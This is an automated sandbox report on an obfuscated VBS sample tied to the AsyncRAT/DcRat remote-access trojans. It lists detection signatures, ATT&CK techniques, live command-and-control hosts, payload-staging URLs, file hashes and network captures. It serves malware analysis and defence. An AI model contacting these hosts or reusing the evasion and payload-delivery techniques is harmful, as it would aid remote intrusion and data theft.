Source: Yara match | File source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR
Source: powershell.exe, 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: MSASCui.exe
Source: powershell.exe, 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: procexp.exe
Source: RegSvcs.exe, 00000004.00000002.2967904859.00000000056AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: powershell.exe, 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: MsMpEng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR
MITRE ATT&CK Matrix

Each row below lists the matrix cells in tactic order, left to right. The number in front of a technique is the count the report shows for that cell; cells without a number are unmatched template entries.

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 1 Scheduled Task/Job | 212 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 221 Scripting | 1 Scheduled Task/Job | 21 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 212 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 Native API | Login Hook | Login Hook | 121 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 1 Exploitation for Client Execution | Network Logon Script | Network Logon Script | 2 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | 22 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | 2 PowerShell | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample: No Antivirus matches
Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains

Source | Detection | Scanner | Label
dczas.duckdns.org | 9% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
http://91.202.233.169 | 9% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
dczas.duckdns.org | 89.117.23.22 | true | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
)8"zc | true | | unknown
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt | true | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://91.202.233.169/Tak/Reg/Marz/Ex | powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1690160988.00000185062A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3Pe.txt | powershell.exe, 00000003.00000002.1690160988.0000018504D6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://91.202.H | powershell.exe, 00000003.00000002.1690160988.00000185058B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000003.00000002.1690160988.00000185058B8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1690160988.00000185062A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://91.202.233.169 | powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.00000185058B8000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://contoso.com/Icon | powershell.exe, 00000003.00000002.1703372117.0000018514A31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://91.202.233.169/Tak/Reg/Marz/DRG/R | powershell.exe, 00000003.00000002.1690160988.0000018505FD7000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
HTTP://91.202.233.169/TAK/REG/MARZ/ENVS/DJ1.TXT | powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018504D6C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1721844392.000002244562B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1721844392.0000022445642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.00000185049C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://91.202.233.169/Tak/Reg/Marz/ENVS/DJ1.txt | powershell.exe, 00000003.00000002.1690160988.0000018506223000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.0000018504D6C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1721844392.000002244566F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1690160988.00000185049C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.2959693552.0000000003181000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.1690160988.0000018504BE1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
91.202.233.169 | unknown | Russian Federation | 9009 | M247GB | true
89.117.23.22 | dczas.duckdns.org | Lithuania | 15419 | LRTC-ASLT | true
General Information

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1523124
Start date and time: 2024-10-01 06:29:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: sostener.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@8/5@7/2
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 15
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 3848 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:29:55 | API Interceptor | 18x Sleep call for process: powershell.exe modified
00:30:19 | API Interceptor | 1x Sleep call for process: RegSvcs.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            91.202.233.169sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                            • 91.202.233.169/Tak/Reg/Marz/ENVS/DJ1.txt
                            sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                            • 91.202.233.169/Tak/Reg/Marz/ENVS/DS1.txt
                            sostener.vbsGet hashmaliciousRemcosBrowse
                            • 91.202.233.169/Tak/Reg/Marz/SH/Rcm.txt
                            sostener.vbsGet hashmaliciousRemcosBrowse
                            • 91.202.233.169/Tak/Reg/Marz/ZQWER/PeF3Dir.txt
                            envifa.vbsGet hashmaliciousRemcosBrowse
                            • 91.202.233.169/Tak/Reg/Marz/ZQWER/PeF3Dir.txt
                            89.117.23.22172771704470d2405c797286a7d66ed6085690f2346b0873f84a2d4bbbbfed17373d12cd4f758.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                              sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                1726981024eaba256966e5d64020ad74d345ce2969fae5805b304862945360330900888386844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                  decode_ba297ca42bf569929d6fafd20a8ed9212b3012291d38a6ec2be3376d5488c4a5.exeGet hashmaliciousRemcosBrowse
                                    decode_43048329e6cd6df3e144e8592c1194cf0da5e9113653ea155e664cbcc08b4b27.exeGet hashmaliciousAsyncRATBrowse
                                      1712325245721159bca57d1b66796bd3ddc0e68293cb290af6bbd263878d0bd09c0ee48caa758.dat-decoded.exeGet hashmaliciousNjratBrowse
                                        1712325245dd14de5ce8bd608ab9ed54b1036ba8bc99d838c1ed6d3361c8ac2ed8ec3c75ba394.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                          1712325246e9ef467ca10a8bb47cc22f360faab318b2059a09a5a7d0c76937a79cfb2a74b2831.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            dczas.duckdns.org172771704470d2405c797286a7d66ed6085690f2346b0873f84a2d4bbbbfed17373d12cd4f758.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                            • 89.117.23.22
                                            sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                            • 89.117.23.22
Match | Associated Sample Name / URL | Detection | Threat Name | Context
M247GB | https://u47113775.ct.sendgrid.net/ls/click?upn=u001.NLjCc2NrF5-2Fl1RHefgLH74dDCI-2FlQUMQCuknF0akr34-3DPZ74_Bz-2FoIC9YMuvgy8ZsoekpZ-2Fn96y0OCAueT5LjwQn-2FX25AbFWdd2iGOJMfOUDymLwSDnjLWUuKOfyExMHrLPQc6sWuvBEF4PT9PwlcB-2BK9NQmoQucfLOeGSzPQg4J-2Bvn2C-2FT7DBGI3L6HQml9TPdefbzANw58o8IwtiN3AMNw21dRhcIy1JE5InQL6ZhzyniB-2FPrKB2Vn9uUJ7Mm1QrvUZh95-2FIqg1tkHnn-2FLCgLCOHUCdp1zwu5x-2Fprfv3kPHwI33RA9-2FJGY9xYPl-2BGH4uHP30vXeaFOwuVkWjx1bpQcAiato1uxhbL8AJAqpgT-2Bg5yQp7xXBACsCORIJr0VehkYFdFdFkgZPx7KSQblwloMm5OUc-2B9bb1d0siCBq5u36Pp2iCgmhq5PmipxmWr1HvrLZkdUUXJjpaRdjjEopb-2Fhw3b-2BUOpmNbUIJywjWyMBcUA9ScKtkpotTga2qo5ZaX-2B7AVyqz8KXtUfTb8SopobzuOWPiU-2BhBa8i7lRIGGQBQZmYU1TWv5mQ8uRPPf-2FWdH9RREF8cMLDET4k24yu8dJdqteeATx8Jfw8MWOWehX6ZTxJWGswooAVOvW116fDJmFNO-2F-2BecR-2Fd9NmRwCYnnK4Bh3IM-3D | malicious | HTMLPhisher | 172.86.79.8
M247GB | 1bhYyrjyNk.vbs | malicious | Unknown | 172.86.98.166
M247GB | WQRNV7bMS5.vbs | malicious | Unknown | 172.86.98.166
M247GB | 6L9vCf48mN.vbs | malicious | Unknown | 172.86.98.166
M247GB | sostener.vbs | malicious | AsyncRAT, DcRat | 91.202.233.169
M247GB | https://timetraveltv.com/actions/cart_update.php?currency=GBP&return_url=https://blog.acelyaokcu.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVdrcFNRMHM9JnVpZD1VU0VSMDkwOTIwMjRVMTIwOTA5MDE=N0123N%5BEMAIL | malicious | Unknown | 195.8.197.149
M247GB | C6DAEyTs7d.rtf | malicious | Remcos | 89.238.176.21
M247GB | file.exe | malicious | Remcos, GuLoader | 172.111.244.109
M247GB | New_Order-Rquest_Quotation_Specifications_Drawings_Samplespdf.bat.exe | malicious | Remcos, GuLoader | 172.111.244.109
M247GB | PO-2609202412666 PNG2023-W101_pdf.bat.exe | malicious | Remcos, GuLoader | 172.111.244.109
LRTC-ASLT | 172771704470d2405c797286a7d66ed6085690f2346b0873f84a2d4bbbbfed17373d12cd4f758.dat-decoded.exe | malicious | AsyncRAT, DcRat | 89.117.23.22
LRTC-ASLT | sostener.vbs | malicious | AsyncRAT, DcRat | 89.117.23.22
LRTC-ASLT | mipsel.elf | malicious | Gafgyt, Mirai | 89.117.23.69
LRTC-ASLT | shelld.x86.elf | malicious | Gafgyt, Mirai | 89.117.23.69
LRTC-ASLT | ppc.elf | malicious | Gafgyt, Mirai | 89.117.23.69
LRTC-ASLT | arm61.elf | malicious | Gafgyt, Mirai | 89.117.23.69
LRTC-ASLT | sh4.elf | malicious | Gafgyt, Mirai | 89.117.23.69
LRTC-ASLT | 586.elf | malicious | Gafgyt, Mirai | 89.117.23.69
LRTC-ASLT | dss.elf | malicious | Gafgyt, Mirai | 89.117.23.69
LRTC-ASLT | mips.elf | malicious | Gafgyt, Mirai | 89.117.23.69
                                            No context
                                            No context
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):0.773832331134527
                                            Encrypted:false
                                            SSDEEP:3:NlllulI:NllU
                                            MD5:132C26A05F791EF716632B05AFDD4127
                                            SHA1:36CABE22E212DA474C7CFA2BE6EA2FDDA847B26C
                                            SHA-256:D91AC8ABA939D15BFA7B1138AF2203B931BD05180CE599FDA34F26B06BD14044
                                            SHA-512:4D80C1BD6BCC1358A59C1056CA12026752EAF29CD7014B6D0ABF1228CDAF042A573344C002937EE218701055B7824A6ED6F1E1394188A86AD468060040BBC7A4
                                            Malicious:false
                                            Reputation:low
                                            Preview:@...e.................................6.S.......................
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            File type:Unicode text, UTF-16, little-endian text, with very long lines (10001), with CRLF line terminators
                                            Entropy (8bit):4.47118382587944
                                            TrID:
                                            • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                            • MP3 audio (1001/1) 33.33%
                                            File name:sostener.vbs
                                            File size:1'977'486 bytes
                                            MD5:640864bd8dcc33f7191cea6e8794a386
                                            SHA1:6b651ed9e576d72b6c53e975e555572701fe2681
                                            SHA256:5b30c27eaca00c51aa594df7273f8e24d84d08a6c085147697e21b082e3e7812
                                            SHA512:ac0b98a599ae60043b4d652d7f2826f26918ae6eb2f99f2dec7c14b34d74bea25264da0962eef619e1c72f67d181c4a1c1d52a71a5d7e734869a18300805cc11
                                            SSDEEP:3072:BiiiiiiiiiiiiiiiiiiiiUiiiiiiiiiiiiiiiiiiiihiiiiiiiiiiiiiiiiiiiij:8
                                            TLSH:B995F0A2314F7DB29346EE29E4718228461B57470B63F50D8C29D6E385702B3DACBED7
                                            File Content Preview:......'.Z.].X...d.>.n...;.d.I...l.&.a.i.+.7.+.W...3.b...W...I...l./._...Q.6.6._...l.6.L.H.l.<. .#.G.[.(.o...W._.\.U.d.m.P.X.+.V.;.V.R.m.>.E...&.:...8.).U..._.b.6...........7...a.g...........K.S.....R.f.5...W.o.e.-.;...o.S.a...d._.H.l...R.o.....K...-.Y...K
                                            Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-01T06:29:58.030429+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49730 | 91.202.233.169 | 80 | TCP
2024-10-01T06:29:58.378098+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49730 | 91.202.233.169 | 80 | TCP
2024-10-01T06:29:58.380252+0200 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 91.202.233.169 | 80 | 192.168.2.4 | 49730 | TCP
2024-10-01T06:30:19.591904+0200 | 2842478 | ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) | 1 | 89.117.23.22 | 4455 | 192.168.2.4 | 49737 | TCP
2024-10-01T06:30:19.591904+0200 | 2034847 | ET MALWARE Observed Malicious SSL Cert (AsyncRAT) | 1 | 89.117.23.22 | 4455 | 192.168.2.4 | 49737 | TCP
2024-10-01T06:30:19.591904+0200 | 2848048 | ETPRO MALWARE Observed Malicious SSL Cert (AsyncRAT) | 1 | 89.117.23.22 | 4455 | 192.168.2.4 | 49737 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 1, 2024 06:29:57.020984888 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:57.026159048 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.026267052 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:57.026890039 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:57.031725883 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.720839977 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.720897913 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.720928907 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.720961094 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.720988989 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:57.720993996 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.721028090 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.721049070 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:57.721061945 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.721084118 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:57.721093893 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.721126080 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.721137047 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:57.721159935 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.721200943 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:57.726119041 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:57.770286083 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:57.808377028 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:57.813178062 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.030160904 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.030205011 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.030261993 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.030428886 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.030477047 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.030509949 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.030544043 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.030544996 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.030571938 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.030599117 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.030854940 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.030881882 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.030908108 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.030972004 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.030998945 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.031019926 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.031214952 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.031246901 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.031264067 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.031280041 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.031311989 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.031327009 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.031802893 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.031855106 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.031932116 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.031965017 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.032011986 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.032300949 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.032331944 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.032365084 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
Oct 1, 2024 06:29:58.032376051 CEST | 49730 | 80 | 192.168.2.4 | 91.202.233.169
Oct 1, 2024 06:29:58.035586119 CEST | 80 | 49730 | 91.202.233.169 | 192.168.2.4
